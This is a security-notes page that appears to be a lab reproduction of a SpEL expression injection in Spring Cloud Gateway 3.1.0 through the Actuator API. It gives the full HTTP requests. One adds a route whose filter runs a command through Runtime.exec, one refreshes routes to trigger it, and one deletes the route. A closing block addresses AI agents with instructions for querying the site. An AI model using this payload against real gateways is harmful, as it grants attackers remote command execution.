# Spring Cloud Gateway Server Unauthorized Access Vulnerability ## Vulnerability Description Spring Cloud Gateway is an API gateway in Spring. Versions 3.1.0 and 3.0.6 (inclusive) and prior contain a SpEL expression injection vulnerability. If an attacker can access the Actuator API, the vulnerability can be exploited to execute arbitrary commands. ## Environment Setup Run the following command to start a web service that uses Spring Cloud Gateway 3.1.0: ``` docker-compose up -d ``` After the service starts, access `http://your-ip:8080` to see the demo page, and the upstream of this page is example.com. ![image-20220519211640099](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-25d0a79386a21d4f4b91e9e6ba92c34695e47071%2Fimage-20220519211640099.png?alt=media) ## Vulnerability Reproduction Exploiting this vulnerability requires multiple steps. First, send the following packet to add a route containing malicious SpEL expression: ``` POST /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.0.5:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36 Connection: close Content-Type: application/json Content-Length: 329 { "id": "hacktest", "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}" } }], "uri": "http://example.com" } ``` ![image-20220519211737396](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-ba70c07d52eb3a1963cf6d009bbf0e7a0091e2cf%2Fimage-20220519211737396.png?alt=media) Then, send the following packet to apply the newly added route. ``` POST /actuator/gateway/refresh HTTP/1.1 Host: 192.168.0.5:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Upgrade-Insecure-Requests: 1 ``` ![image-20220519212128250](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-8631545b6a4ca982c6a265c80110d82efae84142%2Fimage-20220519212128250.png?alt=media) This packet will trigger the execution of the SpEL expression: ![image-20220519212220678](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-9d94e51dfc5e14333f4b0fc057e3d2b46c0027e9%2Fimage-20220519212220678.png?alt=media) Finally, send the following packet to clean up and delete the added route: ``` DELETE /actuator/gateway/routes/hacktest HTTP/1.1 Host: 192.168.0.5:8080 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Connection: close Upgrade-Insecure-Requests: 1 ``` ![image-20220519212306237](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-3f590941db7e8f08a4fd36a1e2af22c0577e2c43%2Fimage-20220519212306237.png?alt=media) Refresh the routes: ![image-20230130134103788](https://3024627155-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FXR7Pin8lqeHtCxmQjCpG%2Fuploads%2Fgit-blob-a3b3586d3059fd1b509664d3ae7e3d9ba087721f%2Fimage-20230130134103788.png?alt=media) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://icybersec.gitbook.io/cybersecuritynote-en/security-vulnerability/unauthorized-vulnerability/spring-cloud-gateway-server-unauthorized-access-vulnerability.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.